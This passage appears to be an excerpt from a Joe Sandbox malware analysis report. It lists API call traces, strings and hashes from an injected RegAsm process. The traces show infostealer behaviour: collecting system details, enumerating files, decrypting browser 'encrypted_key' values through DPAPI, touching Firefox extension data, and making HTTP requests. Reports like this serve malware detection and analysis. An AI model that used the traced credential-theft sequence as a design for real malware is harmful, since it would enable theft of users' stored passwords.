                                                                                                        • GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154
                                                                                                        • wsprintfA.USER32 ref: 0041117A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
                                                                                                        • String ID: %d MB
                                                                                                        • API String ID: 3644086013-2651807785
                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B44
                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B4B
                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B79
                                                                                                        • RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B95
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                        • String ID: Windows 11
                                                                                                        • API String ID: 3676486918-2517555085
                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BBD
                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BC4
                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BE2
                                                                                                        • RegQueryValueExA.KERNEL32(00436888,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ), ref: 00410BFD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                        • String ID: CurrentBuildNumber
                                                                                                        • API String ID: 3676486918-1022791448
                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 004156A4
                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,00000000,?), ref: 004156C4
                                                                                                        • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF), ref: 004156EA
                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00415725
                                                                                                        • lstrcatA.KERNEL32(?), ref: 00415738
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcat$OpenQueryValue_memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 3357907479-0
                                                                                                        APIs
                                                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,763374F0,?,0041CBEE,?,0041CC7C,00000000,06400000,00000003,00000000,0041757F,.exe,00436C5C), ref: 0041BC6E
                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,763374F0,?,0041CBEE,?,0041CC7C,00000000,06400000,00000003,00000000), ref: 0041BCA6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$CreatePointer
                                                                                                        • String ID:
                                                                                                        • API String ID: 2024441833-0
                                                                                                        APIs
                                                                                                        • GetSystemInfo.KERNEL32(?), ref: 6C0AC947
                                                                                                        • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C0AC969
                                                                                                        • GetSystemInfo.KERNEL32(?), ref: 6C0AC9A9
                                                                                                        • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C0AC9C8
                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C0AC9E2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325466692.000000006C091000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C090000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325445154.000000006C090000.00000002.00000001.01000000.00000009.sdmp
                                                                                                        • Associated: 00000002.00000002.3325754871.000000006C10D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                        • Associated: 00000002.00000002.3325812764.000000006C11E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                        • Associated: 00000002.00000002.3325838597.000000006C122000.00000002.00000001.01000000.00000009.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c090000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Virtual$AllocInfoSystem$Free
                                                                                                        • String ID:
                                                                                                        • API String ID: 4191843772-0
                                                                                                        • Opcode ID: 7a87667543131b6822473b47ad9449e85a4dacc0dec20f22a980bd586c11b9cd
                                                                                                        • Instruction ID: 98e9a940971da46dd2a8a60f3b8bb194c714d8754ae9cba4fd8f101b71878c51
                                                                                                        • Opcode Fuzzy Hash: 7a87667543131b6822473b47ad9449e85a4dacc0dec20f22a980bd586c11b9cd
                                                                                                        • Instruction Fuzzy Hash: 32212971711204ABDB04AAE8CC89BAE73F9AB4A344F51011AF907A7F41DB319C048B95
                                                                                                        APIs
                                                                                                        • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                        • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                        • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                        • lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                        • InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CrackInternetlstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1274457161-0
                                                                                                        • Opcode ID: f25c82f9083139f9dc305e99f373a1749f43e790606f1cfdd691ee0f4a79a4b6
                                                                                                        • Instruction ID: f1c5382da97c9dd65e4db87c3c806c9c9b4e03b01775002e3606c6f6cd357758
                                                                                                        • Opcode Fuzzy Hash: f25c82f9083139f9dc305e99f373a1749f43e790606f1cfdd691ee0f4a79a4b6
                                                                                                        • Instruction Fuzzy Hash: E9011B72D00218ABDF149BA9DC45ADEBFB8AF55330F10821AF925F72E0DB745A058B94
                                                                                                        APIs
                                                                                                        • GetEnvironmentVariableA.KERNELBASE(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,0040DB0A), ref: 004083F2
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                          • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                        • SetEnvironmentVariableA.KERNEL32(?,00437194,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,004367C3,?,?,?,?,?,?,?,?,0040DB0A), ref: 00408447
                                                                                                        • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,0040DB0A), ref: 0040845B
                                                                                                        Strings
                                                                                                        • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 004083E6, 004083EB, 00408405
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                        • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                                        • API String ID: 2929475105-4027016359
                                                                                                        • Opcode ID: 04dcee5354247dbc29cf1765c19ad916d25bce8febd7e9a612e053264f62c16e
                                                                                                        • Instruction ID: 1d1035b7872eafe5bc2acfcfd9c5443481a9431a5cd399c5b03dff48eed801cb
                                                                                                        • Opcode Fuzzy Hash: 04dcee5354247dbc29cf1765c19ad916d25bce8febd7e9a612e053264f62c16e
                                                                                                        • Instruction Fuzzy Hash: 20315C71940714ABCF16EF2AED0245D7BA2AB48706F10607BF440B72B0DB7A1A81CF89
                                                                                                        APIs
                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 00416DCD
                                                                                                        • lstrlenA.KERNEL32(?,0000001C), ref: 00416DD8
                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416E5C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3_catchlstrlen
                                                                                                        • String ID: ERROR
                                                                                                        • API String ID: 591506033-2861137601
                                                                                                        • Opcode ID: 987378090a3b2abee121885682ea4995d8af358216b926a009c89c00a445330c
                                                                                                        • Instruction ID: af559da7a52deda925aca90371b7d636d26c87dd73bd3b1907a7f448f6be4e16
                                                                                                        • Opcode Fuzzy Hash: 987378090a3b2abee121885682ea4995d8af358216b926a009c89c00a445330c
                                                                                                        • Instruction Fuzzy Hash: 6F119371900509AFCB40FF75D9025DDBBB1BF04308B90513AE414E3591E739EAA98FC9
                                                                                                        APIs
                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,=A,00000000,?), ref: 0041226C
                                                                                                        • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041228E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                        • String ID: =A
                                                                                                        • API String ID: 3183270410-2399317284
                                                                                                        • Opcode ID: a5843cda12b70cc7bcbf256d8a6036821e346dccf5e361165451a22e509f8efe
                                                                                                        • Instruction ID: 00f88837b3f4b8dbd17d966d98a560f1caae43d713f472eddac2d47ecb876e1e
                                                                                                        • Opcode Fuzzy Hash: a5843cda12b70cc7bcbf256d8a6036821e346dccf5e361165451a22e509f8efe
                                                                                                        • Instruction Fuzzy Hash: D8F0B471600218ABDB24EB68DC45FEE7BBC9B48B08F00006AF645D7180EEB5DAC5CB55
                                                                                                        APIs
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                        • CopyFileA.KERNEL32(?,?,00000001,00437414,0043681B,?,?,?), ref: 0040B3D7
                                                                                                        • lstrlenA.KERNEL32(?), ref: 0040B529
                                                                                                        • lstrlenA.KERNEL32(?), ref: 0040B544
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0040B596
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                        • String ID:
                                                                                                        • API String ID: 211194620-0
                                                                                                        • Opcode ID: 9e3b5aa9e4815655d37b580d824bd8f900de3d495d383a8751fe16bf523792ad
                                                                                                        • Instruction ID: f50e13fd7eda3401684194e3b4178dcbc35dad14aaafdb4021fb065c0cc55dd5
                                                                                                        • Opcode Fuzzy Hash: 9e3b5aa9e4815655d37b580d824bd8f900de3d495d383a8751fe16bf523792ad
                                                                                                        • Instruction Fuzzy Hash: 6F714072A00119ABCF01FFA5EE468CD7775EF14309F104036F500B71A2DBB9AE898B99
                                                                                                        APIs
                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                          • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                          • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                          • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                          • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                          • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                          • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                        • StrStrA.SHLWAPI(00000000,?,00437538,0043688A), ref: 0040D49F
                                                                                                        • lstrlenA.KERNEL32(?), ref: 0040D4B2
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
                                                                                                        • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                                        • API String ID: 161838763-3310892237
                                                                                                        • Opcode ID: 6aa37cb2f67db944989395a71283edee486ac6c96c9a46fa9e3a19fa612f2b1c
                                                                                                        • Instruction ID: 85de75ec200c89e9111d7c6d064248f53d90c55406061a5cb20e0ca06024b096
                                                                                                        • Opcode Fuzzy Hash: 6aa37cb2f67db944989395a71283edee486ac6c96c9a46fa9e3a19fa612f2b1c
                                                                                                        • Instruction Fuzzy Hash: 15410B76A001199BCF10FBA6DD465CD77B5AF04308F51003AFD00B3192DBB8AE4D8AE9
                                                                                                        APIs
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                          • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                          • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                          • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                          • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                          • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                        • StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5
                                                                                                          • Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32($g@,00000000,00000001,00000000,?,00000000,00000000), ref: 00408060
                                                                                                          • Part of subcall function 00408048: LocalAlloc.KERNEL32(00000040,?,?,?,00406724,?), ref: 0040806E
                                                                                                          • Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00408084
                                                                                                          • Part of subcall function 00408048: LocalFree.KERNEL32(?,?,?,00406724,?), ref: 00408093
                                                                                                          • Part of subcall function 004080A1: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
                                                                                                          • Part of subcall function 004080A1: LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080D8
                                                                                                          • Part of subcall function 004080A1: LocalFree.KERNEL32(0040CB95,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080FD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                                                                                        • String ID: $"encrypted_key":"$DPAPI
                                                                                                        • API String ID: 2311102621-738592651
                                                                                                        • Opcode ID: 90210c10ee996d7ab5569050e076cca1abac48211b6b88e599488f63d6b1df73
                                                                                                        • Instruction ID: d78dfd73ee8100a23edce15a91f2c70fa2f38e8288fa49592993377d3a11e596
                                                                                                        • Opcode Fuzzy Hash: 90210c10ee996d7ab5569050e076cca1abac48211b6b88e599488f63d6b1df73
                                                                                                        • Instruction Fuzzy Hash: 1121C232E40209ABDF14EB91DD41ADE7378AF41364F2045BFE950B72D1DF38AA49CA58
                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C), ref: 00410F65
                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410F6C
                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ), ref: 00410F8A
                                                                                                        • RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000), ref: 00410FA6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 3676486918-0
                                                                                                        • Opcode ID: 516f2c0c8b5e6a914cb95f881748b3b593324cf3efc2baeb97f22068c18ac649
                                                                                                        • Instruction ID: 198c8e352812e869def4411d780e2caea40c147a773264a459f6a712475eeb20
                                                                                                        • Opcode Fuzzy Hash: 516f2c0c8b5e6a914cb95f881748b3b593324cf3efc2baeb97f22068c18ac649
                                                                                                        • Instruction Fuzzy Hash: C9F03075640304FBEF148B90DC0AFAE7B7EEB44706F141094F601A51A0E7B29B509B60
                                                                                                        APIs
                                                                                                          • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                        • lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00416378
                                                                                                        • lstrcatA.KERNEL32(?), ref: 00416396
                                                                                                          • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416018
                                                                                                          • Part of subcall function 00415FD1: FindFirstFileA.KERNEL32(?,?), ref: 0041602F
                                                                                                          • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
                                                                                                          • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
                                                                                                          • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416091
                                                                                                          • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
                                                                                                          • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160C2
                                                                                                          • Part of subcall function 00415FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
                                                                                                          • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?), ref: 00416125
                                                                                                          • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
                                                                                                          • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 0041614A
                                                                                                          • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
                                                                                                          • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 00416170
                                                                                                          • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160D9
                                                                                                          • Part of subcall function 00415FD1: FindNextFileA.KERNEL32(?,?), ref: 004162FF
                                                                                                          • Part of subcall function 00415FD1: FindClose.KERNEL32(?), ref: 00416313
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcat$wsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
                                                                                                        • String ID: nzA
                                                                                                        • API String ID: 153043497-1761861442
                                                                                                        • Opcode ID: b4da720962e9555cdd77b7fe306ab90caf7c41af40743b1f06eb89ecc5cf0673
                                                                                                        • Instruction ID: 6a45041e7e61eaec4ac0428956384e3812b0c56a5955d947ae57416d2cc1f0af
                                                                                                        • Opcode Fuzzy Hash: b4da720962e9555cdd77b7fe306ab90caf7c41af40743b1f06eb89ecc5cf0673
                                                                                                        • Instruction Fuzzy Hash: DD31F77280010DEFDF15EB60DC43EE8377AEB08314F5440AEF606932A1EA769B919F55
                                                                                                        APIs
                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                          • Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
                                                                                                          • Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
                                                                                                          • Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
                                                                                                          • Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
                                                                                                          • Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
                                                                                                          • Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
                                                                                                          • Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416873
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
